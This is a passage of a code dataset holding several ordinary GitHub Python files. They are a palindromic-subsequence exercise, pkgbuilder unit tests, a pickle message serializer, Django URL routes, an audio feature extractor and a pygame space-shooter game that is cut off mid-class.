\n# For example, given the string \"DATAMININGSAPIENZA\" the answer should be 7 \n# (dAtamININgsapIenzA)\n############\n\ns = \"DATAMININGSAPIENZA\" # defined Sequence\nnalgo4 = len(s)\n\n## creating a table of rows and column equal to len of string\nDST= [[0 for i in range(nalgo4)]for i in range (nalgo4)]\n\n# for all values where length of sub sequence is 1\nfor i in range (nalgo4):\n DST[i][i] = 1\n \n# for all values where length of subsequence is more than 1\n# we make a loop for the lengths of sub-sequence \nfor sseq in range(2, nalgo4+1): \n for i in range(nalgo4-sseq+1):\n j = i+sseq-1\n if (s[i] == s[j] and sseq == 2): #conditioning for length 2 subsequences\n DST[i][j] = 2\n elif s[i] == s[j]: #conditioning for all sseq greater than 2\n DST[i][j] = DST[i+1][j-1] + 2\n else:\n DST[i][j] = max(DST[i][j-1], DST[i+1][j])\n\nprint(\"The Longest Palindromic sub Sequence is \", DST[0][nalgo4-1])\n","repo_name":"frapez1/Algorithmic-Methods-of-Data-Mining","sub_path":"HW-3/exercise_4.py","file_name":"exercise_4.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18189014332","text":"import unittest\nimport pkgbuilder\nimport pkgbuilder.__main__\nimport pkgbuilder.aur\nimport pkgbuilder.build\nimport pkgbuilder.pbds\nimport pkgbuilder.upgrade\nimport pkgbuilder.utils\nimport pkgbuilder.wrapper\n\n\nclass TestPB(unittest.TestCase):\n maxDiff = None\n # It’s cheaper to use existing package data.\n fpkg = pkgbuilder.package.AURPackage.from_aurdict({\n 'Description': 'A Python AUR helper/library.', 'CategoryID': 16, 'ID':\n 52542, 'Maintainer': 'Kwpolska',\n 'Depends': ['python', 'pyalpm>=0.5.1-1', 'python-requests', 'asp'],\n 'URLPath': '/packages/pk/pkgbuilder/pkgbuilder.tar.gz', 'Version':\n '3.2.0-1', 'PackageBase': 'pkgbuilder', 'FirstSubmitted': 1316529993,\n 'OutOfDate': 1000, 'NumVotes': 19, 'Name': 'pkgbuilderts', 'LastModified':\n 1395757472, 'URL': 'https://github.com/Kwpolska/pkgbuilder', 'License':\n ['BSD'], 'Popularity': 7, 'Keywords': ['foo', 'bar']})\n\n def setUp(self):\n \"\"\"Start stuff.\"\"\"\n pkgbuilder.DS._pycreload()\n #self.patches = [mock.patch('pkgbuilder.aur.AUR.request', self._aurinforequest)]\n #for p in self.patches:\n #p.start()\n\n #def tearDown(self):\n #for p in self.patches:\n #p.stop()\n\n def test_aur(self):\n pkgbuilder.aur.AUR()\n\n def test_pbds(self):\n pkgbuilder.pbds.PBDS()\n\n def test_pbds_logging(self):\n pbds = pkgbuilder.pbds.PBDS()\n pbds.log.debug('PB unittest/TestPB is running now on this machine.')\n\n def test_utils_print_package_search(self):\n sample = ('aur/pkgbuilderts 3.2.0-1 (19 votes) '\n '\\x1b[1;1m\\x1b[1;31m[out of date]\\x1b[1;0m\\n'\n ' A Python AUR helper/library.')\n\n req = pkgbuilder.utils.print_package_search(self.fpkg, True)\n self.assertEqual(req, sample)\n\n def test_utils_print_package_info(self):\n sample = ('Repository : aur\\n'\n 'Name : pkgbuilderts\\n'\n 'Package Base : pkgbuilder\\n'\n 'Version : 3.2.0-1\\n'\n 'URL : https://github.com/Kwpolska/pkgbuilder\\n'\n 'Licenses : BSD\\n'\n 'Groups : None\\n'\n 'Provides : None\\n'\n 'Depends On : python pyalpm>=0.5.1-1 python-requests asp\\n'\n 'Make Deps : None\\n'\n 'Check Deps : None\\n'\n 'Optional Deps : None\\n'\n 'Conflicts With : None\\n'\n 'Replaces : None\\n'\n 'Votes : 19\\n'\n 'Popularity : 7\\n'\n 'Out of Date : \\x1b[1;1m\\x1b[1;31myes\\x1b[1;0m\\n'\n 'Maintainer : Kwpolska\\nFirst Submitted: '\n '2011-09-20T14:46:33Z\\nLast Updated : '\n 
'2014-03-25T14:24:32Z\\nDescription : '\n 'A Python AUR helper/library.\\n'\n 'Keywords : foo bar\\n')\n\n req = pkgbuilder.utils.print_package_info([self.fpkg], True)\n self.assertEqual(req, sample)\n\n def test_main(self):\n # Can’t test too much here…\n pkgbuilder.__main__.main([])\n\n def test_wrapper(self):\n # …or there…\n pkgbuilder.wrapper.wrapper(['unittests', 'UTshibboleet'])\n\n def test_pb_help(self):\n \"\"\"Make sure ``pb --help`` works\"\"\"\n import sys\n from io import StringIO\n capture = StringIO()\n stdout = sys.stdout\n try:\n sys.stdout = capture\n pkgbuilder.wrapper.wrapper('--help')\n finally:\n sys.stdout = stdout\n\n # More interested in whether the above erred than in the actual output\n self.assertTrue(capture.getvalue())\n\n def test_call_pacman(self):\n \"\"\"Make sure ``pb`` command can call pacman\"\"\"\n\n pacman = pkgbuilder.DS.paccommand\n try:\n pkgbuilder.DS.paccommand = 'true'\n pkgbuilder.wrapper.wrapper(['-Qh'])\n finally:\n pkgbuilder.DS.paccommand = pacman\n","repo_name":"Kwpolska/pkgbuilder","sub_path":"tests/test_pkgbuilder.py","file_name":"test_pkgbuilder.py","file_ext":"py","file_size_in_byte":4112,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"37"} +{"seq_id":"18584288147","text":"import pickle\n\n\nclass Message:\n @staticmethod\n def serialize(\n hostname,\n worker_name,\n message_type,\n message_value,\n ):\n message = [\n hostname,\n worker_name,\n message_type,\n message_value,\n ]\n\n serialized_message = pickle.dumps(\n obj=message,\n )\n\n return serialized_message\n\n @staticmethod\n def unserialize(\n message,\n ):\n unserialized_message = pickle.loads(\n data=message,\n encoding='utf-8',\n )\n\n hostname = unserialized_message[0]\n worker_name = unserialized_message[1]\n message_type = unserialized_message[2]\n message_value = unserialized_message[3]\n\n message = {\n 'hostname': hostname,\n 'worker_name': worker_name,\n 'type': message_type,\n 'value': message_value,\n }\n\n return message\n","repo_name":"NattieRavid/tasker","sub_path":"tasker/monitor/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42815754412","text":"from django.urls import path\n\nfrom .views import (\n BoardList, \n BoardDetail,\n BoardListByUser,\n BoardListByLike\n)\nfrom .views import CommentList, CommentDetail\nfrom .views import LikeList, LikeDetail\n\nurlpatterns = [\n path('', BoardList.as_view(), name = BoardList.name),\n path('<int:pk>/', BoardDetail.as_view(), name = BoardDetail.name),\n path('user/like/<str:username>/', BoardListByLike.as_view(), name = BoardListByLike.name),\n path(\"search/user/<str:username>/\", BoardListByUser.as_view(), name = BoardListByUser.name),\n path('comment/', CommentList.as_view(), name = CommentList.name),\n path('comment/<int:pk>/', CommentDetail.as_view(), name = CommentDetail.name),\n path('like/', LikeList.as_view(), name = LikeList.name),\n path('like/<int:pk>/', LikeDetail.as_view(), name = LikeDetail.name),\n]","repo_name":"HodongMan/Remover-Server","sub_path":"timeline/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15353022647","text":"'''\nThe coordinates of the cell vertices are integers. 
Movement is allowed\nonly along the diagonals of the cells. Given the coordinates of a point, find the length of the shortest path\nfrom the origin to that point, rounded to the nearest integer. If no such path exists, output 0.\nInput format\nTwo integers, −19 ≤ X, Y ≤ 19, (X, Y) ≠ (0, 0).\nOutput format\nA non-negative integer.\nExamples\n\nstandard input\n4 0\n\nstandard output\n6\n\nstandard input\n-3 4\n\nstandard output\n0\n\n'''\n\nimport math\n\ndef get_diag_len( x, y ):\n if (x - y) % 2:\n return 0\n else:\n return round( max( abs(x), abs(y) ) * math.sqrt(2) )\n\nx, y = map(int, input().split())\n\nprint(get_diag_len(x, y))\n","repo_name":"zhanybekovich/31github","sub_path":"OlympKRSU/2019-2020/day1/1004-diagonals.py","file_name":"1004-diagonals.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7820223623","text":"from torch import nn\nfrom torchaudio import transforms as T\nfrom nnAudio import features as S\n\n\nclass FeatureExtractor(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.feat = S.MelSpectrogram(sr=config['sample_rate'],\n n_fft=config['win_length'],\n win_length=config['win_length'],\n n_mels=config['n_mels'],\n hop_length=config['hop_length'],\n fmin=config['fmin'],\n fmax=config['fmax'],\n center=True)\n self.db = T.AmplitudeToDB(stype='power', top_db=80)\n\n def forward(self, audio):\n feature = self.feat(audio)\n feature = self.db(feature)\n\n return feature\n\n def _freeze(self, model):\n for name, child in model.named_children():\n for param in child.parameters():\n param.requires_grad = False\n self._freeze(child)\n","repo_name":"seyong92/phoneme-informed-note-level-singing-transcription","sub_path":"phn_ast/feature.py","file_name":"feature.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"37"} +{"seq_id":"74980240107","text":"import pygame\nimport random\nimport os\nimport sys\n\n# Global Variables\nWIDTH = 700 # Width of screen\nHEIGHT = 900 # Height of screen\nFPS = 60 # Game fps\nPSPEED = 5 # Player speed\nPOWERUP_TIME = 5000\n\n# Define colors\nBLACK = (0,0,0)\nWHITE = (255,255,255)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\n\n# Initializes pygame and creates game window\npygame.init()\npygame.mixer.init()\nscreen = pygame.display.set_mode((WIDTH, HEIGHT+3))\npygame.display.set_caption(\"STARFIGHTER\")\nclock = pygame.time.Clock()\n\n# Set up assets folder\ngameFolder = os.path.dirname(__file__)\nimgFolder = os.path.join(gameFolder, \"images\")\nsndFolder = os.path.join(gameFolder, \"sounds\")\n\n# Initializing font\nfontName = pygame.font.match_font('arial')\n\n# Text Draw\ndef draw_text(surf, text, fontSize, x, y):\n font = pygame.font.Font(fontName, fontSize)\n textSurf = font.render(text, True, WHITE)\n textRect = textSurf.get_rect()\n textRect.midtop = (x, y)\n surf.blit(textSurf, textRect)\n\n# Creates new enemy\ndef new_mob(sprite,spriteGroup):\n m = sprite()\n allSprites.add(m)\n spriteGroup.add(m)\n \n# Shield bar\ndef draw_shield_bar(surf, x, y, pct):\n if pct < 0:\n pct = 0\n BAR_LENGTH = 200\n BAR_HEIGHT = 10\n fill = (pct / 100) * BAR_LENGTH\n outlineRect = pygame.Rect(x, y, BAR_LENGTH, BAR_HEIGHT)\n fillRect = pygame.Rect(x, y, fill, BAR_HEIGHT)\n pygame.draw.rect(surf, GREEN, fillRect)\n pygame.draw.rect(surf, WHITE, outlineRect, 2)\n\n# Player lives\ndef draw_lives(surf, x, y, lives, img):\n for i in 
range(lives):\n imgRect = img.get_rect()\n imgRect.x = x + 30 * i\n imgRect.y = y\n surf.blit(img, imgRect)\n \n# Player sprite\nclass Player(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = playerImg \n self.image.set_colorkey(BLACK)\n self.rect = self.image.get_rect()\n self.radius = int(self.rect.width * 0.75 / 2)\n self.rect.centerx = (WIDTH/2)\n self.rect.bottom = HEIGHT - 100\n self.speedx = 0\n self.speedy = 0\n self.shootDelay = 250\n self.lastShot = pygame.time.get_ticks()\n self.shield = 100\n self.lives = 3\n self.hidden = False\n self.hideTimer = pygame.time.get_ticks()\n self.power = 1\n self.powertime = pygame.time.get_ticks()\n \n def update(self):\n # powerup timeout\n if self.power >= 2 and pygame.time.get_ticks() - self.powertime > POWERUP_TIME:\n self.power = 1\n self.powertime = pygame.time.get_ticks()\n \n if self.hidden and pygame.time.get_ticks() - self.hideTimer > 2000:\n self.hidden = False\n self.rect.centerx = WIDTH / 2\n self.rect.bottom = HEIGHT - 100\n \n self.speedx = 0\n self.speedy = 0\n key = pygame.key.get_pressed()\n \n # Player controls/Movement\n if key[pygame.K_a]:\n self.speedx = -PSPEED\n if key[pygame.K_d]:\n self.speedx = PSPEED\n if key[pygame.K_w] and self.rect.top < HEIGHT+50:\n self.speedy = -PSPEED\n if key[pygame.K_s] and self.rect.top < HEIGHT+50:\n self.speedy = PSPEED\n if key[pygame.K_SPACE] and self.rect.top < HEIGHT + 50:\n self.shoot() \n self.rect.x += self.speedx\n self.rect.y += self.speedy\n \n # Player boundaries\n if self.rect.right > WIDTH:\n self.rect.right = WIDTH\n if self.rect.left < 0:\n self.rect.left = 0\n if self.rect.bottom > HEIGHT and self.hidden != True:\n self.rect.bottom = HEIGHT\n if self.rect.top < HEIGHT - 350:\n self.rect.top = HEIGHT - 350\n \n def powerup(self):\n self.power += 1\n self.powertime = pygame.time.get_ticks()\n \n def shoot(self):\n now = pygame.time.get_ticks()\n if now - self.lastShot > self.shootDelay:\n self.lastShot = now\n if self.power == 1:\n bullet = Bullet(self.rect.centerx, self.rect.top, blueBulletImg)\n allSprites.add(bullet)\n bullets.add(bullet)\n laser1.play()\n if self.power == 2:\n bullet1 = Bullet(self.rect.left+2, self.rect.top+6, blueBulletImg)\n bullet2 = Bullet(self.rect.right-2, self.rect.top+6, blueBulletImg)\n allSprites.add(bullet1)\n allSprites.add(bullet2)\n bullets.add(bullet1)\n bullets.add(bullet2)\n laser1.play()\n if self.power >= 3:\n bullet1 = Bullet(self.rect.left+2, self.rect.top+6, blueBulletImg)\n bullet2 = Bullet(self.rect.right-2, self.rect.top+6, blueBulletImg)\n bullet3 = Bullet(self.rect.centerx, self.rect.top, blueBulletImg)\n bullet1.speedx = -3\n bullet2.speedx = 3\n allSprites.add(bullet1)\n allSprites.add(bullet2)\n allSprites.add(bullet3)\n bullets.add(bullet1)\n bullets.add(bullet2)\n bullets.add(bullet3)\n laser1.play() \n \n # Temporarily hides player\n def hide(self):\n self.hidden = True\n self.power = 1\n self.hideTimer = pygame.time.get_ticks()\n self.rect.centerx= WIDTH/2\n self.rect.bottom = HEIGHT + 200\n \n# Enemy sprites\n\n# Asteroids\nclass Asteroid(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.imageOrig = random.choice(meteorImg)\n self.imageOrig.set_colorkey(BLACK)\n self.image = self.imageOrig.copy()\n self.rect = self.image.get_rect()\n self.radius = int(self.rect.width * 0.85 / 2)\n self.rect.x = random.randrange((WIDTH+50) - (self.rect.width-50))\n self.rect.y = random.randrange(-350,-250)\n self.speedy = random.randrange(3,5)\n 
self.speedx = random.randrange(-3,3)\n self.rot = 0\n self.rotSpeed = random.randrange(-8,8)\n self.lastUpdate = pygame.time.get_ticks() \n \n def rotate(self):\n now = pygame.time.get_ticks()\n if now - self.lastUpdate > 50:\n self.lastUpdate = now\n self.rot = (self.rot + self.rotSpeed) % 360\n newImage = pygame.transform.rotate(self.imageOrig, self.rot)\n oldCenter = self.rect.center\n self.image = newImage\n self.rect = self.image.get_rect()\n self.rect.center = oldCenter\n \n def update(self):\n self.rotate()\n self.rect.x += self.speedx\n self.rect.y += self.speedy\n if self.rect.top > HEIGHT + 10 or self.rect.left < -150 or self.rect.right > WIDTH + 150:\n self.rect.x = random.randrange(WIDTH - self.rect.width)\n self.rect.y = random.randrange(-100,-40)\n self.speedy = random.randrange(1,5)\n \n \n# Enemy starfighter\nclass EnemyFighter(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = random.choice(fighterImg)\n self.image.set_colorkey(BLACK)\n self.rect = self.image.get_rect()\n self.radius = int(self.rect.width * 0.85 /2)\n self.rect.x = random.randrange(100,600)\n self.rect.y = random.randrange(-350,-250)\n self.speedy = random.randrange(3,7)\n self.speedx = random.randrange(-5,5)\n self.dive = random.random()\n self.lowerBound = random.randrange(300,450)\n self.upperBound = random.randrange(150,200)\n self.diveSound = False\n self.lastShot = pygame.time.get_ticks()\n self.shootDelay = random.randrange(500,1500) \n \n def shoot(self):\n now = pygame.time.get_ticks()\n if now - self.lastShot > self.shootDelay:\n self.lastShot = now\n self.shootDelay = random.randrange(500,1500)\n bullet = Bullet(self.rect.centerx, self.rect.bottom,redBulletImg)\n bullet.speedy = 6\n bullet.rect.top = self.rect.bottom\n eBullets.add(bullet)\n laser2.play() \n \n def update(self):\n # Randomizes for dive\n if self.dive > 0.7:\n self.rect.x += 0\n self.rect.y += 15\n if self.diveSound == False:\n flyby.play()\n self.diveSound = True\n \n # Fighter movement\n elif self.dive < 0.7:\n self.rect.x += self.speedx\n self.rect.y += self.speedy\n if self.rect.bottom > self.lowerBound and self.speedy >= 0:\n self.speedy = -self.speedy\n self.speedx = random.randrange(-5, 5)\n self.upperBound = random.randrange(50,200)\n if self.rect.top < self.upperBound and self.speedy <= 0:\n self.speedy = abs(self.speedy)\n self.speedx = random.randrange(-5, 5)\n self.lowerBound = random.randrange(300,450)\n self.shoot()\n \n # Fighter boundaries\n if self.rect.left <= 0:\n self.rect.left == 0\n self.speedx = abs(self.speedx)\n if self.rect.right >= WIDTH:\n self.rect.right == 0\n self.speedx = -self.speedx\n if self.rect.bottom > HEIGHT + 50:\n self.rect.x = random.randrange(100,600)\n self.rect.y = random.randrange(-100, -40)\n self.speedy = random.randrange(3, 7)\n self.speedx = random.randrange(-5, 5)\n self.dive = random.random()\n self.lowerBound = random.randrange(300,450)\n self.upperBound = random.randrange(150,200)\n\n\n# Enemy Gunship\nclass Gunship(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = gunshipImg\n self.image.set_colorkey(BLACK)\n self.rect = self.image.get_rect()\n self.radius = int(self.rect.width * 0.85 /2)\n self.rect.x = random.randrange(50,600)\n self.rect.y = -500\n self.speedy = 2\n self.speedx = 0\n self.lastShot = pygame.time.get_ticks()\n self.emptyClip = pygame.time.get_ticks()\n self.shootDelay = 400\n self.clipSize = 12\n self.clipReload = 3000\n self.health = 5\n \n def shoot(self):\n now 
= pygame.time.get_ticks()\n if now - self.lastShot > self.shootDelay and self.rect.bottom > 20 and self.clipSize > 0:\n self.lastShot = now\n bullet1 = Bullet(self.rect.left, self.rect.bottom, greenBulletImg)\n bullet2 = Bullet(self.rect.right, self.rect.bottom, greenBulletImg)\n bullet2.speedy = 6\n bullet1.speedy = 6\n bullet1.rect.top = self.rect.bottom\n bullet2.rect.top = self.rect.bottom\n self.clipSize -= 1\n eBullets.add(bullet1)\n eBullets.add(bullet2)\n laser3.play()\n if self.clipSize == 0:\n self.emptyClip = pygame.time.get_ticks()\n self.clipSize = -1\n if now - self.emptyClip > self.clipReload and self.clipSize == -1:\n self.clipSize = 12\n \n def update(self):\n # Gunship movement\n self.rect.x += self.speedx\n self.rect.y += self.speedy\n if self.rect.top > 100 and self.speedy == 2:\n self.speedy = 0\n self.speedx = random.choice((-3,3))\n self.shoot()\n \n # Gunship boundaries\n if self.rect.left < 0:\n self.rect.left = 0\n self.speedx = abs(self.speedx)\n if self.rect.right > WIDTH:\n self.rect.right = WIDTH\n self.speedx = -self.speedx\n\n# Enemy UFO\nclass UFO(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.imageOrig = ufoImg\n self.imageOrig.set_colorkey(BLACK)\n self.image = self.imageOrig.copy()\n self.rect = self.image.get_rect()\n self.radius = int(self.rect.width / 2)\n self.rect.x = random.randrange(50,600)\n self.rect.y = -300\n self.speedy = 3\n self.rot = 0\n self.rotSpeed = 10\n self.health = 4\n self.shootDelay = 1200\n self.lastUpdate = pygame.time.get_ticks()\n self.lastShot = pygame.time.get_ticks()\n \n def rotate(self):\n now = pygame.time.get_ticks()\n if now - self.lastUpdate > 50:\n self.lastUpdate = now\n self.rot = (self.rot + self.rotSpeed) % 360\n newImage = pygame.transform.rotate(self.imageOrig, self.rot)\n oldCenter = self.rect.center\n self.image = newImage\n self.rect = self.image.get_rect()\n self.rect.center = oldCenter\n \n def gun(self, x, y):\n bullet = Bullet(self.rect.centerx, self.rect.centerx, greenBulletImg)\n bullet.speedx = x\n bullet.speedy = y\n bullet.rect.top = self.rect.bottom\n allSprites.add(bullet)\n eBullets.add(bullet)\n \n def shoot(self):\n now = pygame.time.get_ticks()\n if now - self.lastShot > self.shootDelay and self.rect.bottom > 20:\n self.lastShot = now\n self.gun(0, 2)\n self.gun(-2, 2)\n self.gun(2, 2)\n self.gun(-1, 2)\n self.gun(1, 2)\n laser3.play() \n \n def update(self):\n self.rotate()\n self.rect.y += self.speedy\n if self.rect.top > 300 and self.speedy >= 0:\n self.speedy = -2\n if self.rect.bottom < 200 and self.speedy <= 0:\n self.speedy = 2\n self.shoot()\n \n\n# Enemy Boss\nclass Boss(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.imageOrig = bossImg\n self.imageOrig.set_colorkey(RED)\n self.image = self.imageOrig\n self.rect = self.image.get_rect()\n self.dam_image = bossDamagedImg\n self.dam_image.set_colorkey(RED)\n self.radius = int(self.rect.width * 0.55 / 2)\n self.rect.centerx = WIDTH / 2\n self.rect.y = -500\n self.speedy = 2\n self.speedx = 0\n self.health = 400\n self.damaged = False\n self.damTimer = pygame.time.get_ticks()\n self.alarm = 1\n \n # Side guns\n self.sideGun_lastShot = pygame.time.get_ticks()\n self.sideGun_empty = pygame.time.get_ticks()\n self.sideGun_shootDelay = 100\n self.sideGun_clipSize = 30\n self.sideGun_reload = 3000\n \n # Torpedoes\n self.torpedo_lastShot = pygame.time.get_ticks()\n self.torpedo_empty = pygame.time.get_ticks()\n self.torpedo_shootDelay = 4000\n \n # AA guns\n 
self.aaGun_lastShot = pygame.time.get_ticks()\n self.aaGun_empty = pygame.time.get_ticks()\n self.aaGun_shootDelay = 600\n self.aaGun_reload = random.randrange(1500,2500)\n self.aaGun_clipSize = 3\n \n # Rotary gun\n self.rotary_lastShot = pygame.time.get_ticks()\n self.rotary_empty = pygame.time.get_ticks()\n self.rotary_shootDelay = 450\n self.rotary_clipSize = 20\n self.rotary_reload = 3000\n self.x = 0\n self.y = 5\n self.gun = 1\n \n # Side Guns \n def SideGuns(self, x):\n ray = Bullet(x, self.rect.bottom, sideBulletImg)\n ray.speedy = 10\n ray.rotSpeed = 0\n ray.rect.top = self.rect.bottom-60\n eBullets.add(ray)\n \n # Torpedoes\n def Torpedoes(self, x, y, b):\n torpedo = Bullet(b, self.rect.bottom, blueBulletOrigImg)\n torpedo.speedx = x\n torpedo.speedy = y \n torpedo.rotSpeed = 4\n torpedo.rect.top = self.rect.bottom-200\n eBullets.add(torpedo)\n \n # AA guns\n def AAGuns(self, x, y):\n aaGun = Bullet(x, self.rect.bottom, aaBulletImg)\n aaGun.speedy = 5\n aaGun.rotSpeed = 0\n aaGun.rect.top = y\n eBullets.add(aaGun)\n \n # Rotary gun\n def RotaryGun(self, x, y, b):\n rotary = Bullet(b, self.rect.bottom, redBulletImg)\n rotary.speedx = x\n rotary.speedy = y\n rotary.rect.top = self.rect.top+150\n eBullets.add(rotary) \n\n def shoot(self):\n now = pygame.time.get_ticks()\n \n # Side guns\n if now - self.sideGun_lastShot > self.sideGun_shootDelay and self.sideGun_clipSize > 0:\n self.sideGun_lastShot = now\n self.SideGuns(self.rect.left + 60)\n self.SideGuns(self.rect.right - 60)\n self.sideGun_clipSize -= 1\n if self.sideGun_clipSize == 0:\n self.sideGun_empty = pygame.time.get_ticks()\n self.sideGun_clipSize = -1\n if now - self.sideGun_empty > self.sideGun_reload and self.sideGun_clipSize == -1:\n self.sideGun_clipSize = 40\n \n # Phases\n if self.health <= 350 and self.alarm == 1:\n alarm.play()\n self.alarm = 2 \n if self.health <= 250 and self.alarm == 2:\n alarm.play()\n self.alarm = 3\n if self.health <= 150 and self.alarm == 3:\n alarm.play()\n self.alarm = 4\n if self.health <= 50 and self.alarm == 4:\n alarm.play()\n self.alarm = 5\n \n # Torpedoes\n if now - self.torpedo_lastShot > self.torpedo_shootDelay and self.health < 350:\n self.torpedo_lastShot = now\n self.Torpedoes(0, 3, self.rect.centerx)\n self.Torpedoes(-1, 3, self.rect.centerx-25)\n self.Torpedoes(1, 3, self.rect.centerx+25)\n self.Torpedoes(2, 2.8, self.rect.centerx+50)\n self.Torpedoes(-2, 2.8, self.rect.centerx-50)\n \n # AA guns\n if now - self.aaGun_lastShot > self.aaGun_shootDelay and self.aaGun_clipSize > 0:\n self.aaGun_lastShot = now\n self.aaGun_clipSize -= 1\n self.AAGuns(self.rect.centerx-95, self.rect.bottom-50)\n self.AAGuns(self.rect.centerx-130, self.rect.bottom-100)\n self.AAGuns(self.rect.centerx+95, self.rect.bottom-50)\n self.AAGuns(self.rect.centerx+130, self.rect.bottom-100)\n laser3.play()\n if self.aaGun_clipSize == 0:\n self.aaGun_empty = pygame.time.get_ticks()\n self.aaGun_clipSize = -1\n if now - self.aaGun_empty > self.aaGun_reload and self.aaGun_clipSize == -1:\n self.aaGun_clipSize = 3\n self.aaGun_reload = random.randrange(1500,2500)\n \n # Rotary Gun\n if now - self.rotary_lastShot > self.rotary_shootDelay and self.rotary_clipSize > 0 and self.health < 250:\n self.rotary_lastShot = now\n self.rotary_clipSize -= 1\n if self.y == 5 and self.x == 0 and self.gun == 1:\n self.RotaryGun(self.x, self.y, self.rect.centerx+10)\n self.RotaryGun(self.x, self.y, self.rect.centerx-10)\n self.y = 4\n self.x = 1\n self.gun = 2\n elif self.y == 4 and self.gun == 2:\n self.RotaryGun(self.x, 
self.y, self.rect.centerx+10)\n self.RotaryGun(self.x, self.y, self.rect.centerx-10)\n self.y = 3\n self.x = 2\n self.gun = 3\n elif self.y == 3 and self.gun == 3:\n self.RotaryGun(self.x, self.y, self.rect.centerx+10)\n self.RotaryGun(self.x, self.y, self.rect.centerx-10)\n self.y = 4\n self.x = 1\n self.gun = 4\n elif self.y == 4 and self.gun == 4:\n self.RotaryGun(self.x, self.y, self.rect.centerx+10)\n self.RotaryGun(self.x, self.y, self.rect.centerx-10)\n self.y = 5\n self.x = 0\n self.gun = 5\n elif self.y == 5 and self.gun == 5:\n self.RotaryGun(self.x, self.y, self.rect.centerx+10)\n self.RotaryGun(self.x, self.y, self.rect.centerx-10)\n self.y = 4\n self.x = -1\n self.gun = 6\n elif self.y == 4 and self.gun == 6:\n self.RotaryGun(self.x, self.y, self.rect.centerx+10)\n self.RotaryGun(self.x, self.y, self.rect.centerx-10)\n self.y = 3\n self.x = -2\n self.gun = 7\n elif self.y == 3 and self.gun == 7:\n self.RotaryGun(self.x, self.y, self.rect.centerx+10)\n self.RotaryGun(self.x, self.y, self.rect.centerx-10)\n self.y = 4\n self.x = -1\n self.gun = 8\n elif self.y == 4 and self.gun == 8:\n self.RotaryGun(self.x, self.y, self.rect.centerx+10)\n self.RotaryGun(self.x, self.y, self.rect.centerx-10)\n self.y = 5\n self.x = 0\n self.gun = 1\n laser2.play()\n if self.rotary_clipSize == 0:\n self.rotary_empty = pygame.time.get_ticks()\n self.rotary_clipSize = -1\n if now - self.rotary_empty> self.rotary_reload and self.rotary_clipSize == -1:\n self.rotary_clipSize = 20\n \n def update(self):\n # Damage animation\n if self.damaged == True:\n self.damaged = False\n self.damTimer = pygame.time.get_ticks()\n self.image = self.dam_image\n if self.damaged == False and pygame.time.get_ticks() - self.damTimer > 50:\n self.image = self.imageOrig\n \n # Boss movement\n self.rect.x += self.speedx\n self.rect.y += self.speedy\n if self.rect.top > 25 and self.speedy == 2:\n self.speedy = 0\n self.speedx = random.choice((-1,1))\n \n # Shoot if entered stage\n if self.speedy == 0:\n self.shoot()\n \n # Boss boundaries\n if self.rect.left < 0:\n self.rect.left = 0\n self.speedx = abs(self.speedx)\n if self.rect.right > WIDTH:\n self.rect.right = WIDTH\n self.speedx = -self.speedx\n \n \n# Bullets\nclass Bullet(pygame.sprite.Sprite):\n def __init__(self, x, y, img):\n pygame.sprite.Sprite.__init__(self)\n self.imageOrig = img\n self.imageOrig.set_colorkey(BLACK)\n self.image = self.imageOrig.copy()\n self.rect = self.image.get_rect()\n self.rect.bottom = y\n self.rect.centerx = x\n self.speedx = 0.0\n self.speedy = -10.0\n self.radius = 10\n self.rot = 0\n self.rotSpeed = -20\n self.lastUpdate = pygame.time.get_ticks() \n \n def rotate(self):\n now = pygame.time.get_ticks()\n if now - self.lastUpdate > 50:\n self.lastUpdate = now\n self.rot = (self.rot + self.rotSpeed) % 360\n newImage = pygame.transform.rotate(self.imageOrig, self.rot)\n oldCenter = self.rect.center\n self.image = newImage\n self.rect = self.image.get_rect()\n self.rect.center = oldCenter \n \n def update(self):\n self.rotate()\n self.rect.y += self.speedy\n self.rect.x += self.speedx\n \n # Deletes bullet if it leaves screen\n if self.rect.bottom < 0:\n self.kill()\n if self.rect.top > HEIGHT:\n self.kill()\n if self.rect.right < 0:\n self.kill()\n if self.rect.left > WIDTH:\n self.kill()\n\n \n# Power Ups \nclass PowerUp(pygame.sprite.Sprite):\n def __init__(self, center):\n pygame.sprite.Sprite.__init__(self)\n self.type = random.choice([\"shield\", \"gun\"])\n self.image = powerUpImg[self.type]\n self.image.set_colorkey(BLACK)\n 
